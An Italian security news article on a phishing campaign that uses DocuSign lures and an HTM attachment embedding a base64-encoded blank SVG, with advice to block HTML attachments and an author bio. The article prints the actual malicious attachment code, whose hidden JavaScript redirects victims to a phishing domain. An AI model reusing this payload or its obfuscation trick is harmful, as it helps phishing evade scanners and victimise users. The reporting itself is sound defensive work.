Il malware si nasconde in un’immagine vuota: attenzione alle e-mail di phishing!

I ricercatori della società di sicurezza informatica Avanan hanno scoperto che gli aggressori stanno aggirando il servizio VirusTotal iniettando malware in immagini vuote nelle e-mail di phishing.

La mimica è la seguente: un criminale informatico invia a una potenziale vittima un documento fraudolento relativo al servizio di gestione elettronica dei documenti DocuSign. 

La vittima è invitata a visionare e firmare il documento. In particolare, a differenza di altre campagne di phishing, il collegamento porta gli utenti alla vera pagina di DocuSign.

Esempio di email di phishing

Quindi la vittima è convinta dell’autenticità della lettera. 

Tuttavia, il ruolo principale nell’attacco è svolto dall’allegato HTM inviato insieme al collegamento DocuSign. 

L’allegato contiene un’immagine SVG codificata utilizzando Base64. Sebbene l’immagine sia vuota, questo file contiene JavaScript che reindirizza a un URL dannoso in cui gli hacker infettano ulteriormente l’utente

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <title>Title</title>
</head>

<body>
  <embed src="data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiA/PjxzdmcgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIj48Y2lyY2xlPjwvY2lyY2xlPjxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij48IVtDREFUQVtwYXJlbnQud2luZG93LnBvc3RNZXNzYWdlKCJodHRwczovL2F3aW4xLmNvbS9jcmVhZC5waHA/YXdpbm1pZD0xNjMyOCZhd2luYWZmaWQ9NDIxMjI1JnVlZD1odHRwczovL25hNGRvY3VjaGVjay5uaWdodHNreS50ay8/dXNlcm5hbWU9IiwgIioiKV1dPjwvc2NyaXB0Pjwvc3ZnPg==">
  <script>
    window.addEventListener("message", (event) => {
        console.log(event)
        if (event.data)
            window.location = event.data;
    }, false);
  </script>
</body>

</html>

Questa campagna differisce dalle altre in quanto utilizza un’immagine vuota con contenuto attivo all’interno. Tale immagine non viene rilevata dai servizi tradizionali come VirusTotal, spiegano i ricercatori.

Per evitare di diventare vittime di tali attacchi, si consiglia agli utenti di diffidare di qualsiasi e-mail contenente allegati in formato HTML o HTM. Inoltre, gli amministratori possono bloccare tutti gli allegati in formato HTML.

Ti è piaciuto questo articolo? Ne stiamo discutendo nella nostra Community su LinkedIn, Facebook e Instagram. Seguici anche su Google News, per ricevere aggiornamenti quotidiani sulla sicurezza informatica o Scrivici se desideri segnalarci notizie, approfondimenti o contributi da pubblicare.

Marcello Filacchioni

ICT CISO e Cyber Security Manager con oltre vent’anni di esperienza tra settore pubblico e privato, ha guidato progetti di sicurezza informatica per realtà di primo piano. Specializzato in risk management, governance e trasformazione digitale, ha collaborato con vendor internazionali e startup innovative, contribuendo all’introduzione di soluzioni di cybersecurity avanzate. Possiede numerose certificazioni (CISM, CRISC, CISA, PMP, ITIL, CEH, Cisco, Microsoft, VMware) e svolge attività di docenza pro bono in ambito Cyber Security, unendo passione per l’innovazione tecnologica e impegno nella diffusione della cultura della sicurezza digitale.

Aree di competenza: Cyber Security Strategy & Governance, Vulnerability Management & Security Operations.